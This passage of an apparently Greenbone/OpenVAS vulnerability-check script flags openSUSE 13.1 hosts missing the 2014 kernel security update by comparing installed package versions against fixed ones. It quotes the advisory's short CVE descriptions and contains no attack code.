script_oid(\"1.3.6.1.4.1.25623.1.0.850628\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-12-22 05:56:12 +0100 (Mon, 22 Dec 2014)\");\n script_cve_id(\"CVE-2013-2891\", \"CVE-2013-2898\", \"CVE-2014-0181\", \"CVE-2014-0206\",\n \"CVE-2014-1739\", \"CVE-2014-3181\", \"CVE-2014-3182\", \"CVE-2014-3184\",\n \"CVE-2014-3185\", \"CVE-2014-3186\", \"CVE-2014-3673\", \"CVE-2014-3687\",\n \"CVE-2014-3688\", \"CVE-2014-4171\", \"CVE-2014-4508\", \"CVE-2014-4608\",\n \"CVE-2014-4611\", \"CVE-2014-4943\", \"CVE-2014-5077\", \"CVE-2014-5206\",\n \"CVE-2014-5207\", \"CVE-2014-5471\", \"CVE-2014-5472\", \"CVE-2014-6410\",\n \"CVE-2014-7826\", \"CVE-2014-7841\", \"CVE-2014-7975\", \"CVE-2014-8133\",\n \"CVE-2014-8709\", \"CVE-2014-9090\", \"CVE-2014-9322\", \"CVE-2014-8884\",\n \"CVE-2014-4715\", \"CVE-2013-7263\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"openSUSE: Security Advisory for kernel (openSUSE-SU-2014:1677-1)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The openSUSE 13.1 kernel was updated to fix security issues and bugs:\n\n Security issues fixed: CVE-2014-9322: A local privilege escalation in the\n x86_64 32bit compatibility signal handling was fixed, which could be used\n by local attackers to crash the machine or execute code.\n\n CVE-2014-9090: The do_double_fault function in arch/x86/kernel/traps.c in\n the Linux kernel did not properly handle faults associated with the Stack\n Segment (SS) segment register, which allowed local users to cause a denial\n of service (panic) via a modify_ldt system call, as demonstrated by\n sigreturn_32 in the linux-clock-tests test suite.\n\n CVE-2014-8133: Insufficient validation of TLS register usage could leak\n information from the kernel stack to userspace.\n\n CVE-2014-0181: The Netlink implementation in the Linux kernel through\n 3.14.1 did not provide a mechanism for authorizing socket operations based\n on the opener of a socket, which allowed local users to bypass intended\n access restrictions and modify network configurations by using a Netlink\n socket for the (1) stdout or (2) stderr of a setuid program. (bsc#875051)\n\n CVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel on 32-bit\n x86 platforms, when syscall auditing is enabled and the sep CPU feature\n flag is set, allowed local users to cause a denial of service (OOPS and\n system crash) via an invalid syscall number, as demonstrated by number\n 1000.\n\n CVE-2014-3688: The SCTP implementation in the Linux kernel allowed remote\n attackers to cause a denial of service (memory consumption) by triggering\n a large number of chunks in an association's output queue, as demonstrated\n by ASCONF probes, related to net/sctp/inqueue.c and\n net/sctp/sm_statefuns.c.\n\n CVE-2014-3687: The sctp_assoc_lookup_asconf_ack function in\n net/sctp/associola.c in the SCTP implementation in the Linux kernel\n allowed remote attackers to cause a denial of service (panic) via\n duplicate ASCONF chunks that trigger an incorrect uncork within the\n side-effect interpreter.\n\n CVE-2014-7975: The do_umount function in fs/namespace.c in the Linux\n kernel did not require the CAP_SYS_ADMIN capability for do_remount_sb\n calls that change the root filesystem to read-only, which allowed local\n users to cause a denial of service (loss of writability) by making certain\n unshare system calls, clearing the / MNT_LOCKED flag, and making an\n MNT_FORCE umount system call.\n\n CVE-2014-8884: Stack-based buffer overflow in the\n ttusbdecfe_dvbs_diseqc_send_master_cmd function in\n drivers/media/usb/ttusb-dec/ttusbdecfe.c in the Linux kernel allowed local\n users to c ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"affected\", value:\"kernel on openSUSE 13.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"openSUSE-SU\", value:\"2014:1677-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE13\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE13.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base-debuginfo\", rpm:\"kernel-debug-base-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel-debuginfo\", rpm:\"kernel-debug-devel-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop\", rpm:\"kernel-desktop~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-base\", rpm:\"kernel-desktop-base~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-base-debuginfo\", rpm:\"kernel-desktop-base-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-debuginfo\", rpm:\"kernel-desktop-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-debugsource\", rpm:\"kernel-desktop-debugsource~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-devel\", rpm:\"kernel-desktop-devel~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-devel-debuginfo\", rpm:\"kernel-desktop-devel-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2\", rpm:\"kernel-ec2~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base\", rpm:\"kernel-ec2-base~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base-debuginfo\", rpm:\"kernel-ec2-base-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-debuginfo\", rpm:\"kernel-ec2-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-debugsource\", rpm:\"kernel-ec2-debugsource~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-devel\", rpm:\"kernel-ec2-devel~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-devel-debuginfo\", rpm:\"kernel-ec2-devel-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-base-debuginfo\", rpm:\"kernel-trace-base-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-debuginfo\", rpm:\"kernel-trace-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-debugsource\", rpm:\"kernel-trace-debugsource~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-devel\", rpm:\"kernel-trace-devel~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-devel-debuginfo\", rpm:\"kernel-trace-devel-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-devel-debuginfo\", rpm:\"kernel-vanilla-devel-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base-debuginfo\", rpm:\"kernel-xen-base-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel-debuginfo\", rpm:\"kernel-xen-devel-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop\", rpm:\"cloop~2.639~11.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-debuginfo\", rpm:\"cloop-debuginfo~2.639~11.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-debugsource\", rpm:\"cloop-debugsource~2.639~11.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-default\", rpm:\"cloop-kmp-default~2.639_k3.11.10_25~11.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-default-debuginfo\", rpm:\"cloop-kmp-default-debuginfo~2.639_k3.11.10_25~11.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-desktop\", rpm:\"cloop-kmp-desktop~2.639_k3.11.10_25~11.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-desktop-debuginfo\", rpm:\"cloop-kmp-desktop-debuginfo~2.639_k3.11.10_25~11.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-xen\", rpm:\"cloop-kmp-xen~2.639_k3.11.10_25~11.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"cloop-kmp-xen-debuginfo\", rpm:\"cloop-kmp-xen-debuginfo~2.639_k3.11.10_25~11.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash\", rpm:\"crash~7.0.2~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-debuginfo\", rpm:\"crash-debuginfo~7.0.2~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-debugsource\", rpm:\"crash-debugsource~7.0.2~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-devel\", rpm:\"crash-devel~7.0.2~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-doc\", rpm:\"crash-doc~7.0.2~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-eppic\", rpm:\"crash-eppic~7.0.2~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-eppic-debuginfo\", rpm:\"crash-eppic-debuginfo~7.0.2~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-gcore\", rpm:\"crash-gcore~7.0.2~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-gcore-debuginfo\", rpm:\"crash-gcore-debuginfo~7.0.2~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-default\", rpm:\"crash-kmp-default~7.0.2_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-default-debuginfo\", rpm:\"crash-kmp-default-debuginfo~7.0.2_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-desktop\", rpm:\"crash-kmp-desktop~7.0.2_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-desktop-debuginfo\", rpm:\"crash-kmp-desktop-debuginfo~7.0.2_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-xen\", rpm:\"crash-kmp-xen~7.0.2_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"crash-kmp-xen-debuginfo\", rpm:\"crash-kmp-xen-debuginfo~7.0.2_k3.11.10_25~2.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-debugsource\", rpm:\"hdjmod-debugsource~1.28~16.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-default\", rpm:\"hdjmod-kmp-default~1.28_k3.11.10_25~16.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-default-debuginfo\", rpm:\"hdjmod-kmp-default-debuginfo~1.28_k3.11.10_25~16.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-desktop\", rpm:\"hdjmod-kmp-desktop~1.28_k3.11.10_25~16.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-desktop-debuginfo\", rpm:\"hdjmod-kmp-desktop-debuginfo~1.28_k3.11.10_25~16.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-xen\", rpm:\"hdjmod-kmp-xen~1.28_k3.11.10_25~16.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"hdjmod-kmp-xen-debuginfo\", rpm:\"hdjmod-kmp-xen-debuginfo~1.28_k3.11.10_25~16.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset\", rpm:\"ipset~6.21.1~2.20.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-debuginfo\", rpm:\"ipset-debuginfo~6.21.1~2.20.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-debugsource\", rpm:\"ipset-debugsource~6.21.1~2.20.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-devel\", rpm:\"ipset-devel~6.21.1~2.20.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-default\", rpm:\"ipset-kmp-default~6.21.1_k3.11.10_25~2.20.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-default-debuginfo\", rpm:\"ipset-kmp-default-debuginfo~6.21.1_k3.11.10_25~2.20.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-desktop\", rpm:\"ipset-kmp-desktop~6.21.1_k3.11.10_25~2.20.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-desktop-debuginfo\", rpm:\"ipset-kmp-desktop-debuginfo~6.21.1_k3.11.10_25~2.20.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-xen\", rpm:\"ipset-kmp-xen~6.21.1_k3.11.10_25~2.20.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ipset-kmp-xen-debuginfo\", rpm:\"ipset-kmp-xen-debuginfo~6.21.1_k3.11.10_25~2.20.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget\", rpm:\"iscsitarget~1.4.20.3~13.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-debuginfo\", rpm:\"iscsitarget-debuginfo~1.4.20.3~13.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-debugsource\", rpm:\"iscsitarget-debugsource~1.4.20.3~13.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kmp-default\", rpm:\"iscsitarget-kmp-default~1.4.20.3_k3.11.10_25~13.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kmp-default-debuginfo\", rpm:\"iscsitarget-kmp-default-debuginfo~1.4.20.3_k3.11.10_25~13.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kmp-desktop\", rpm:\"iscsitarget-kmp-desktop~1.4.20.3_k3.11.10_25~13.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kmp-desktop-debuginfo\", rpm:\"iscsitarget-kmp-desktop-debuginfo~1.4.20.3_k3.11.10_25~13.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kmp-xen\", rpm:\"iscsitarget-kmp-xen~1.4.20.3_k3.11.10_25~13.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"iscsitarget-kmp-xen-debuginfo\", rpm:\"iscsitarget-kmp-xen-debuginfo~1.4.20.3_k3.11.10_25~13.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel-debuginfo\", rpm:\"kernel-default-devel-debuginfo~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.11.10~25.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libipset3\", rpm:\"libipset3~6.21.1~2.20.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libipset3-debuginfo\", rpm:\"libipset3-debuginfo~6.21.1~2.20.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ndiswrapper\", rpm:\"ndiswrapper~1.58~16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ndiswrapper-debuginfo\", rpm:\"ndiswrapper-debuginfo~1.58~16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ndiswrapper-debugsource\", rpm:\"ndiswrapper-debugsource~1.58~16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ndiswrapper-kmp-default\", rpm:\"ndiswrapper-kmp-default~1.58_k3.11.10_25~16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ndiswrapper-kmp-default-debuginfo\", rpm:\"ndiswrapper-kmp-default-debuginfo~1.58_k3.11.10_25~16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ndiswrapper-kmp-desktop\", rpm:\"ndiswrapper-kmp-desktop~1.58_k3.11.10_25~16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ndiswrapper-kmp-desktop-debuginfo\", rpm:\"ndiswrapper-kmp-desktop-debuginfo~1.58_k3.11.10_25~16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock\", rpm:\"pcfclock~0.44~258.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-debuginfo\", rpm:\"pcfclock-debuginfo~0.44~258.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-debugsource\", rpm:\"pcfclock-debugsource~0.44~258.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-default\", rpm:\"pcfclock-kmp-default~0.44_k3.11.10_25~258.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-default-debuginfo\", rpm:\"pcfclock-kmp-default-debuginfo~0.44_k3.11.10_25~258.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-desktop\", rpm:\"pcfclock-kmp-desktop~0.44_k3.11.10_25~258.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"pcfclock-kmp-desktop-debuginfo\", rpm:\"pcfclock-kmp-desktop-debuginfo~0.44_k3.11.10_25~258.16.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-virtualbox\", rpm:\"python-virtualbox~4.2.18~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-virtualbox-debuginfo\", rpm:\"python-virtualbox-debuginfo~4.2.18~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-debugsource\", rpm:\"vhba-kmp-debugsource~20130607~2.17.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-default\", rpm:\"vhba-kmp-default~20130607_k3.11.10_25~2.17.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-default-debuginfo\", rpm:\"vhba-kmp-default-debuginfo~20130607_k3.11.10_25~2.17.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-desktop\", rpm:\"vhba-kmp-desktop~20130607_k3.11.10_25~2.17.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-desktop-debuginfo\", rpm:\"vhba-kmp-desktop-debuginfo~20130607_k3.11.10_25~2.17.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-xen\", rpm:\"vhba-kmp-xen~20130607_k3.11.10_25~2.17.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"vhba-kmp-xen-debuginfo\", rpm:\"vhba-kmp-xen-debuginfo~20130607_k3.11.10_25~2.17.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox\", rpm:\"virtualbox~4.2.18~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"virtualbox-debuginfo\", rpm:\"virtualbox-debuginfo~4.2.18~2.21.1\", rls:\"openSUSE13.1\"))) {\n report += res;\n }\n\n if(!isnull(res = 